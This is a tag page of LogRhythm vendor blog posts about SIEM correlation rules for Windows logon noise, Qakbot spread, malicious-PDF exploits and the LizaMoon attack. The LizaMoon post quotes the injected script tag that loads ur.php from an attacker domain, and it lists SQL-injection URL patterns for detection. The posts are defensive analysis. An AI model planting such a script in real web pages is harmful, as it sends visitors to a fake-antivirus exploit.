Posts tagged: 'advanced correlation'
The following posts are associated with the tag you have selected. You may subscribe to the RSS feed for this tag to receive future updates relevant to the topic(s) of your interest.http://blog.logrhythm.com/tags/advanced-correlation/feed
Using the Advanced Intelligence (AI) Engine with LogRhythm allows users to correlate among all the logs in a network and alert when there is anything unusual in the log patterns. My team, the Knowledge Engineers, is tasked with creating rules for advanced correlation and pattern recognition. In the early days of the AI Engine, however, we ran across many unexpected challenges when building many of our prepackaged correlation rules.
Let’s start with an example:
One of our AI Engine rules is designed to detect a brute force attempt followed by a successful login on the same account. First this rule looks to see if there are at least 5 authentication failures followed by a successful logon by that same origin login. Seems simple enough, however in the AI Engine Beta program we discovered that this alert fires way too often.
Why is this? Investigation into this issue showed us that the Windows logon process doesn’t produce logs exactly how we expected (or how we would like). It turns out that if domain controllers in the environment are connected, then an authentication failure log is produced for every domain controller in the system. This means that in a large environment, someone who types their password incorrectly only one time can produce as many authentication failure logs as there are domain controllers in the network running active directory. In this case, this AI Engine rule, which is supposed to catch people logging into accounts that aren’t theirs, had a very high false positive rate during beta testing.
But that raised the question what about other windows authentication events, such as logons, so we decided to investigate further. Testing logons just around our office yielded a wide variety of results. When I logged in I produced 12 logs classified as Authentication Success and even 4 logs that were classified as Logoffs. Another employee produced 49 logs with a single logon! Some of these logon logs are simply connections to shared resources like a network drive – not actual logons. If a typical user of LogRhythm wants to investigate a specific employee, they will want to find the exact time the employee in question logged on, what they accessed, and what that person did with the objects they accessed. This is a daunting task for a user that doesn’t have a deep understanding of Windows authentication events.
With the creation of the AI Engine rules we realized just how noisy authentication events actually are in Windows. To address this issue, we have fine-tuned our common events and AI Engine rules to filter out all of this extra noise. Because AI Engine rules can leverage all of LogRhythm’s extensive normalization, data enrichment and log parsing, they can be quickly modified for much greater accuracy. And a typical LogRhythm user can investigate incidents without having to understand every individual detail of the Windows authentication process. That is what every SIEM product user is looking for – a simple way to understand exactly what is happening in their network without needing a detailed knowledge of the authentication process.
Not only did this analysis help us create more refined AI Engine rules with fewer false positives, it gave us more refined guidance for normalization, making LogRhythm easier for our customers to use.
The recent compromise at The Hartford Insurance Company highlights the fact that AV software by itself isn’t always an adequate defense – even for malware that has been in the wild for quite some time. It was reported that a W32-Qakbot variant was utilized in this attack – something that has been around since 2009. Qakbot is a piece of malware that has Trojan functionality and spreads via network shares.
After some basic research it looks like Qakbot variants, once installed, reach out to external servers to download a payload providing the extended Trojan functionality, and then spread via network shares. A simple AI Engine rule that looks for an outbound connection opening, followed quickly by network activity or port scanning activity on TCP ports 139 and 445 and/or UDP ports 137 and 138 from the same host would detect Qakbot as it attempts to spread throughout the network (as well as many other types of malware that follow the same activity pattern).
A SIEM solution with strong pattern recognition capabilities can provide a wider view rather than just focusing on how an exploit works or whether AV signatures will recognize the malicious files as they are scanned. Automated advanced correlation rules can be written to alarm on the activity of the malware. A similar decentralized threat detection approach is outlined in one of my previous blog posts on SQL Injections.
Zak Wolff, our resident malware analyst/SME is taking a closer look at the Hartford breach and will be following up with additional details.
While I will be posting a more in-depth analysis of the LizaMoon attack, here are a few early thoughts from Dave Pack while his blogger profile gets set up. Dave manages LogRhythm’s Knowledge Engineering department and has been working in information security and advanced data analysis for over ten years.
Various security organizations/bloggers are tracking a mass SQL Injection currently being called “LizaMoon” (one of the first websites identified). While we haven’t a chance to fully analyze the attack, based on information being aggregated by SANS and Stackoverflow, it looks like this is a combination SQL Injection/Stored XSS Attack, the final target being client-side end-users.
It appears that the SQL Injection is taking advantage of a web application vulnerability. The injection itself is delivering a Stored XSS attack to the vulnerably web servers, consisting of a script (< / title> < script src = http : // google-stats49.info/ur.php >) that redirects unlucky internet users to a different site hosting a file named ur.php. This php file is where the dirty work is actually done. It launches an exploit which installs fake AV software on the end-user’s machine.
What’s really interesting is that the SQL injection is really just a means of delivering the much more dangerous Stored XSS to vulnerable web servers. Stored XSS are much scarier than a standard Reflected XSS because a user doesn’t have to be tricked into clicking a maliciously crafted URL. The XSS attack is simply sitting on the web server, waiting for any unlucky internet user to browse to the compromised website.
We’re attempting to get our hands on the ur.php code for further analysis of the client-side exploit, after which one of our analysts will be posting an update. In the meantime, here are some things both web administrators and end users can do to detect this attack and help protect against it.
1. Implement standard protections, such as sanitizing all database inputs and using parameterized queries across the board, to limit what can get through.
2. Check if a web server is being targeted by most types of SQL injections.
a. In particular, look at your access logs for “)-” in the URL. It is extremely rare for legitimate input to be commenting out the rest of a SQL statement.
b. Check for various encodings of the same string as well. LogRhythm provides an out-of-the-box AI Engine advanced correlation rule that looks for these strings in a URL and will alarm on any injection attempts.
1. If the functionality is available in your infrastructure, block any attempts to access a website with “ur.php” in the URL.
A recently released Symantec report estimates that 65% of all targeted attacks in 2010 were executed using malicious PDFs. According to the study, this is a 12.4% increase from 2009. ”If this trend were to continue at the same rate it has for the last year, by mid-2011, 76% of targeted malware could be used for PDF-based attacks”, the study continues.
In the event that something gets through and also gets executed, let’s look at how you could detect the attack using correlation rules within your SIEM.
For this experiment I looked at a number of malicious PDFs including MD5:411406d5ace2201e5dd73ce8e696b03b. When run, this file exploits a remote memory corruption vulnerability that causes the application to crash while processing the malicious .PDF file. The issue kicks off when the reader tries to initialize the file cooltype.dll. When run, this file crashes Adobe generating an event that’s resulting behavior will be the basis for one of our primary advanced correlation rule blocks.
3/24/2011 8:16 PM TYPE=Error USER= COMP=XXXXX SORC=Application Error CATG=(0) EVID=1000 MESG=Faulting application acrord32.exe, version 18.104.22.168, faulting module unknown, version 0.0.0.0, fault address 0x6753e2ed.
From there we look for some more specific rule blocks. One that could be valuable would be a block for a File Integrity Monitor log indicating that someone opened/read cooltype.dll. As cooltype.dll attacks were not isolated to this particular vulnerability (CVE-2010-2883,CVE-2010-3654, and CVE-2010-1241) this could play well in a number of hands.
While these two events alone might help shed light on possible attacks, they can also be prone to false positives requiring that you fine-tune the blocks a bit more on this rule. The next blocks are somewhat dependent on your environment and what devices you are logging. The basic behavior, however, will remain the same regardless of what devices you are collecting from and the various vendors.
The next block is more general because we are now just looking for basic malicious behavior. If your first line defenses didn’t prevent the infiltration and the PDF was executed, there is a good chance it will need to phone home to download a payload. This can be done in a number of ways, so we will add a few rule blocks to monitor for some of those possible scenarios.
You may already have rules in place to monitor for outbound SMTP connections from machines that should not be generating such traffic, but the threshold is likely in place to only alert on a large number of instances. In the case of a targeted attack we would not expect this kind of general spambot behavior. Try setting the threshold much lower for this rule, perhaps even on an instance of one outbound SMTP connection.
It may try to phone home VIA HTTP on port 80, so we’ll add a rule block that checks routers, firewalls and/or NetFlow-generating devices for any source of port 80 traffic not originating from a known web server. We may also want to watch for traffic on port 80 that is not HTTP. In the case of a targeted attack, privacy is typically important to the attacker. Outbound SSL traffic might be considered significant in this situation.
We don’t want to leave out the low hanging fruit so we can include rule blocks on a classification or common event of malware detected correlated against any IDS alerts that may have occurred within a relevant time span. We might also add criteria for older communication methods like IRC just to be safe. In the event that the initial exploit does not crash Adobe in a way that triggers an event log we would also layer in a second line of defense on our primary rule block. Using one of LogRhythm’s endpoint monitoring capabilities, we can monitor process explorer and take note of the acrord32.exe process starting within a relevant time frame of the subsequent events.
Periodic maintenance of these rules is necessary to keep them relevant. Stay current on zero day (Adobe and Microsoft) exploits and pay attention to what files they are working against. Incorporate these target files (cooltype.dll) into rules whenever possible. Ideally this would be before patches are released.
There will never be a silver bullet to detect malicious attacks. But with creative use of your SIEM’s advanced correlation rules you can alert on some very interesting behavior. Obviously you should start with the basics and keep your systems patched. But in the event that something slips through your 1st line defenses, why not exercise your SIEM solution to the fullest to help keep your network secure?
Today LogRhythm officially released our Advanced Intelligence (AI) Engine – a fully integrated extension of our core solution that performs advanced correlation and pattern recognition. And while the concept isn’t new, we’re pretty sure that once you take a look, you’ll see that the execution is pretty groundbreaking.
So what is advanced correlation and pattern recognition? In practical terms, it’s being able to automatically identify a sequence of events and recognize a relevant pattern of behavior that will have some sort of impact on another event that will happen as a result. If this were to take place in your brain, it might happen something like this… You walk in the house from the garage and shut the door behind you. Once that’s done, you might expect to see moonlight coming through the next doorway as you make your way up the stairs. So logically if it’s too dark something is wrong. You should automatically realize that the absence of light once you shut the door behind you means that the next door is shut. Typically you would register the correlation between the two and you would know to put your hand out to open the next door. Unless you, like me, are on autopilot by the time you get home from work. Because there are better ways to make that connection than with your forehead.
Unlike your brain, an IT environment is not typically capable of recognizing an important sequence on its own. That’s why solutions exist to analyze event data and let you know when something has or is about to happen that may cause you pain. From a security standpoint that might be five failed login attempt from a single unknown IP followed by a successful login indicating that you may have suffered an external breach.
Tools for doing this have been around for a while, but with limitations. One of them is that they are typically restricted to analyzing a subset of data that has already filtered out significant information before it ever gets to the correlation engine. This narrows the scope of coverage to specific security-oriented use cases and takes away the flexibility to cast a wider net for event sequences that may not be as well defined. AI Engine has removed this limitation by allowing advanced correlation rules to be run against all log data. By doing so we have expanded the scope of what you can do with advanced correlation and pattern recognition to extend well beyond the standard security use cases. An operations example would be when you have a critical process that may start and stop on a regular basis. Operationally this is standard behavior. You don’t need to know every time the process stops or you’ll quickly start ignoring the alerts. But you do need to know when it doesn’t start back up within a certain time frame.
Perhaps the biggest drawback of most advanced correlation tools is their complexity. They may work well within the confines of their preconfigured rules, but adaptability and usability are limited. They’re kind of like a remote control that handles a few functions and operates your television. Your options for adding new features to the remote are limited. If you have the tools, the time and the knowledge, you can take the remote apart and rebuild it to handle your new blue-ray player. Practically speaking you will probably be adding a second remote to your collection or you’ll be waiting for a remote that someone else builds that is capable of working with your tv and blue-ray. Add a receiver for a new sound system and you have a third remote. Now this may not be that bad at home, but imagine you have thousands of heterogeneous devices that you need to control, and limited time to do so. What you really need is one universal remote that handles all of your devices and can be easily programmed to handle what you have now and what you will add in the future. And as new features are added, the remote has to adapt to those as well.
It’s the same thing with pattern recognition. Sure there are specific behavior patterns that you know you have to identify because they are similar for all environments, but over time, that behavior may change. And there are things that you may want to watch for that are less defined but no less important to detect. For those things you need the ability to cast a wider net and once you are able to detect and understand those behavior patterns that are more general, you also need to be able to quickly put a rule in place that will narrow in on specific activities. Without a usable interface, advanced correlation tools lack the flexibility to adapt to what you need in your environment or to keep up with new behavior patterns that are critical to security and operations.
AI Engine is accessed through LogRhythm’s console, with the same consistent look and feel inherent to all LogRhythm tools. A wizard-based interface with a drag-and-drop GUI for defining advanced correlation makes creating and customizing even complex rules simple to learn and quick to execute. It also correlates against all log data – not just a pre-filtered subset of security events. AI Engine analyzes over 50 different metadata fields and many more sub-fields that provide highly relevant data for analysis and correlation. The metadata fields map to system, network and application information extracted from the logs themselves, but they also include context that is derived from the log information such as direction, impacted entities, the city from which activity originated and more. The extensive metadata from which advanced correlation rules and patterns can be defined, combined with the entirety of all log data against which these rules can be applied, offers unprecedented visibility and context to threats and operational issues that have been blind spots for many organizations until now. At the same time, AI Engine can easily be used to cast a wide net with more general correlation rules, ensuring that significant incidents are captured despite changes in event behavior. Sure AI Engine comes with over 100 rules ready to go out-of-the-box covering a wide range of common use cases, both general and tightly focused. But we’ve also designed it to work for you.
If you want to know more about our AI Engine, we’ll be happy to show you how it works. Just let us know. Or check out Chris Petersen’s video in which he demonstrates AI Engine. You can hear the entire LogRhythm story or simply jump to the chapter on AI Engine. Watch the Demo.